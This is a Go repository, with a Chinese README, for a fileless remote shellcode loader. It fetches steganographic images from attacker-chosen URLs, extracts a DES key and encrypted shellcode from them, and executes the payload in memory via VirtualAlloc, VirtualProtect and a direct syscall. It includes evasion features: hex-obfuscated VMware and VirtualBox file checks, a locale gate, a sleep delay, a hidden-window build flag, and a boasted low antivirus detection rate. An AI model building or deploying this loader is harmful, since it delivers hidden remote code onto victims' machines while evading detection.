├── .idea
    ├── .name
    ├── .gitignore
    ├── misc.xml
    ├── modules.xml
    └── shellcode-web-load.iml
├── 123.png
├── 456.png
├── root
    ├── encode.go
    ├── decode.go
    ├── getimg.go
    └── checkvm.go
├── go.mod
├── main.go
├── go.sum
├── README.md
└── exp
    └── root.go


/.idea/.name:
--------------------------------------------------------------------------------
1 | shellcode-web-load


--------------------------------------------------------------------------------
/123.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TryGOTry/go-shellcode-webimg-load/HEAD/123.png


--------------------------------------------------------------------------------
/456.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TryGOTry/go-shellcode-webimg-load/HEAD/456.png


--------------------------------------------------------------------------------
/root/encode.go:
--------------------------------------------------------------------------------
1 | package root
2 | 
3 | import "encoding/hex"
4 | 
5 | func Encode(str string) string {
6 | 	s, _ := hex.DecodeString(str)
7 | 	return string(s)
8 | }
9 | 


--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
1 | module shellcode
2 | 
3 | go 1.14
4 | 
5 | require (
6 | 	github.com/auyer/steganography v1.0.0
7 | 	golang.org/x/sys v0.0.0-20210309074719-68d13333faf2
8 | )
9 | 


--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	"shellcode/exp"
 5 | )
 6 | var deskey string
 7 | var descode string
 8 | 
 9 | func main() {
10 | 	exp.Exp(deskey,descode)   //执行
11 | }
12 | 


--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /dataSources/
6 | /dataSources.local.xml
7 | # 基于编辑器的 HTTP 客户端请求
8 | /httpRequests/
9 | 


--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="JavaScriptSettings">
4 |     <option name="languageLevel" value="ES6" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/.idea/modules.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="ProjectModuleManager">
4 |     <modules>
5 |       <module fileurl="file://$PROJECT_DIR$/.idea/shellcode-web-load.iml" filepath="$PROJECT_DIR$/.idea/shellcode-web-load.iml" />
6 |     </modules>
7 |   </component>
8 | </project>


--------------------------------------------------------------------------------
/.idea/shellcode-web-load.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="WEB_MODULE" version="4">
3 |   <component name="Go" enabled="true" />
4 |   <component name="NewModuleRootManager">
5 |     <content url="file://$MODULE_DIR$" />
6 |     <orderEntry type="inheritedJdk" />
7 |     <orderEntry type="sourceFolder" forTests="false" />
8 |   </component>
9 | </module>


--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
1 | github.com/auyer/steganography v1.0.0 h1:0jty6tzmLff01Oe1Nz197XcutYV+LhgUhySCbfNQUrI=
2 | github.com/auyer/steganography v1.0.0/go.mod h1:Q2qN+f1ixaXnKTCT4xkSDCZ/5NiOpUeTgOCLwQdJD+A=
3 | golang.org/x/sys v0.0.0-20210309074719-68d13333faf2 h1:46ULzRKLh1CwgRq2dC5SlBzEqqNCi8rreOZnNrbqcIY=
4 | golang.org/x/sys v0.0.0-20210309074719-68d13333faf2/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
5 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | 图片隐写的远程shellcode加载器，无文件落地版本
 2 | ---
 3 | 采用des加密，所以需要des加密的shellcode网址,和des的key（将隐写的图片放入web服务器）
 4 | ---
 5 | vt查杀率：4/66
 6 | ![avatar](https://github.com/TRYblog/shellcode-load-web/blob/main/123.png)
 7 | 微步
 8 | ![avatar](https://github.com/TRYblog/shellcode-load-web/blob/main/456.png)
 9 | ### 如何编译
10 | ```
11 |  go build -ldflags "-w -H=windowsgui -X main.deskey=deskey的网址 -X main.descode=descode的网址"
12 | ```
13 | ### 关于shellcode加密
14 | [相关项目](https://github.com/TRYblog/des.hex-encodefile)
15 | 直接加密64位的raw格式的payload即可
16 | ### 关于图片隐写
17 | [在线生成](http://c2.57dir.com)
18 | 图片隐写项目:https://github.com/auyer/steganography
19 | ### 关于作者
20 | 一个菜鸟.
21 | [个人博客](https://www.nctry.com)
22 | 
23 | 2021.03.10
24 | 


--------------------------------------------------------------------------------
/root/decode.go:
--------------------------------------------------------------------------------
 1 | package root
 2 | 
 3 | import (
 4 | 	"bytes"
 5 | 	"crypto/des"
 6 | 	"encoding/hex"
 7 | 	_ "image/jpeg"
 8 | )
 9 | 
10 | func ZeroUnPadding(origData []byte) []byte {
11 | 	return bytes.TrimFunc(origData,
12 | 		func(r rune) bool {
13 | 			return r == rune(0)
14 | 		})
15 | }
16 | func Decrypt(decrypted string, key []byte) string { //des解密
17 | 	src, err := hex.DecodeString(decrypted)
18 | 	if err != nil {
19 | 		return ""
20 | 	}
21 | 	block, err := des.NewCipher(key)
22 | 	if err != nil {
23 | 		return ""
24 | 	}
25 | 	out := make([]byte, len(src))
26 | 	dst := out
27 | 	bs := block.BlockSize()
28 | 	if len(src)%bs != 0 {
29 | 		return ""
30 | 	}
31 | 	for len(src) > 0 {
32 | 		block.Decrypt(dst, src[:bs])
33 | 		src = src[bs:]
34 | 		dst = dst[bs:]
35 | 	}
36 | 	out = ZeroUnPadding(out)
37 | 	return string(out)
38 | }
39 | 
40 | 


--------------------------------------------------------------------------------
/root/getimg.go:
--------------------------------------------------------------------------------
 1 | package root
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"crypto/tls"
 6 | 	"fmt"
 7 | 	"github.com/auyer/steganography"
 8 | 	"image"
 9 | 	_ "io/ioutil"
10 | 	"net/http"
11 | 	"net/http/cookiejar"
12 | )
13 | 
14 | func Getimg(url string) string {  //解码img
15 | 	tr := &http.Transport{
16 | 		TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
17 | 	}
18 | 	//http cookie接口
19 | 	cookieJar, _ := cookiejar.New(nil)
20 | 	c := &http.Client{
21 | 		Jar:       cookieJar,
22 | 		Transport: tr,
23 | 	}
24 | 	resp, err := c.Get(url)
25 | 	if err != nil {
26 | 		fmt.Println("获取失败.")
27 | 	}
28 | 	defer resp.Body.Close()
29 | 	reader := bufio.NewReader(resp.Body)
30 | 	img, _, err := image.Decode(reader)
31 | 	sizeOfMessage := steganography.GetMessageSizeFromImage(img) // Uses the library to check the message size
32 | 	msg := steganography.Decode(sizeOfMessage, img)
33 | 	decodestr := string(msg)
34 | 	return decodestr
35 | }
36 | 


--------------------------------------------------------------------------------
/root/checkvm.go:
--------------------------------------------------------------------------------
 1 | package root
 2 | //检测vm虚拟机
 3 | import "os"
 4 | 
 5 | func Fack(path string) { //判断虚拟机关键文件是否存在
 6 | 	b, _ := PathExists(path)
 7 | 	if b {
 8 | 		os.Exit(1) //退出进程
 9 | 	}
10 | }
11 | func PathExists(path string) (bool, error) { //判断文件是否存在
12 | 	_, err := os.Stat(path)
13 | 	if err == nil {
14 | 		return true, nil
15 | 	}
16 | 	if os.IsNotExist(err) {
17 | 		return false, nil
18 | 	}
19 | 	return false, err
20 | }
21 | func Check() {
22 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C566D6D6F7573652E737973"))
23 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C766D747261792E646C6C"))
24 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C564D546F6F6C73486F6F6B2E646C6C"))
25 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C766D6D6F7573657665722E646C6C"))
26 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C766D686766732E646C6C"))
27 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C766D47756573744C69622E646C6C"))
28 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C56426F784D6F7573652E737973"))
29 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C56426F7847756573742E737973"))
30 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C56426F7853462E737973"))
31 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C447269766572735C56426F78566964656F2E737973"))
32 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F78646973702E646C6C"))
33 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F78686F6F6B2E646C6C"))
34 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F786F676C6572726F727370752E646C6C"))
35 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F786F676C706173737468726F7567687370752E646C6C"))
36 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F78736572766963652E657865"))
37 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C76626F78747261792E657865"))
38 | 	Fack(Encode("433A5C77696E646F77735C53797374656D33325C56426F78436F6E74726F6C2E657865"))
39 | }
40 | 


--------------------------------------------------------------------------------
/exp/root.go:
--------------------------------------------------------------------------------
 1 | package exp
 2 | 
 3 | import (
 4 | 	"encoding/hex"
 5 | 	"fmt"
 6 | 	"golang.org/x/sys/windows"
 7 | 	"os"
 8 | 	"shellcode/root"
 9 | 	"syscall"
10 | 	"time"
11 | 	"unsafe"
12 | )
13 | 
14 | const (
15 | 	// MEM_COMMIT is a Windows constant used with Windows API calls
16 | 	MEM_COMMIT = 0x1000
17 | 	// MEM_RESERVE is a Windows constant used with Windows API calls
18 | 	MEM_RESERVE = 0x2000
19 | 	// PAGE_EXECUTE_READ is a Windows constant used with Windows API calls
20 | 	PAGE_EXECUTE_READ = 0x20
21 | 	// PAGE_READWRITE is a Windows constant used with Windows API calls
22 | 	PAGE_READWRITE = 0x04
23 | )
24 | 
25 | func Exp(deskey string, descode string) {
26 | 	a, err := windows.GetUserPreferredUILanguages(windows.MUI_LANGUAGE_NAME)
27 | 	if err == nil {
28 | 		if a[0] != "zh-CN" {
29 | 			fmt.Printf("当前不是中文系统")
30 | 			os.Exit(1)
31 | 		} else {
32 | 			key := []byte(root.Getimg(deskey))
33 | 			code := root.Getimg(descode)
34 | 			root.Check()
35 | 			time.Sleep(time.Duration(10) * time.Second) //延时时间
36 | 			shellcode, errShellcode := hex.DecodeString(root.Decrypt(code, key))
37 | 			if errShellcode != nil {
38 | 			}
39 | 			//fmt.Println("key:", key, "\ncode:", code)
40 | 			kernel32 := windows.NewLazySystemDLL("kernel32.dll")
41 | 			ntdll := windows.NewLazySystemDLL("ntdll.dll")
42 | 			VirtualAlloc := kernel32.NewProc("VirtualAlloc")
43 | 			VirtualProtect := kernel32.NewProc("VirtualProtect")
44 | 			RtlCopyMemory := ntdll.NewProc("RtlCopyMemory")
45 | 			addr, _, errVirtualAlloc := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)
46 | 			if errVirtualAlloc != nil && errVirtualAlloc.Error() != "The operation completed successfully." {
47 | 			}
48 | 			_, _, errRtlCopyMemory := RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)))
49 | 			if errRtlCopyMemory != nil && errRtlCopyMemory.Error() != "The operation completed successfully." {
50 | 			}
51 | 			oldProtect := PAGE_READWRITE
52 | 			_, _, errVirtualProtect := VirtualProtect.Call(addr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect)))
53 | 
54 | 			if errVirtualProtect != nil && errVirtualProtect.Error() != "The operation completed successfully." {
55 | 
56 | 			}
57 | 			_, _, errSyscall := syscall.Syscall(addr, 0, 0, 0, 0)
58 | 			if errSyscall != 0 {
59 | 			}
60 | 
61 | 		}
62 | 	}
63 | }
64 | 


--------------------------------------------------------------------------------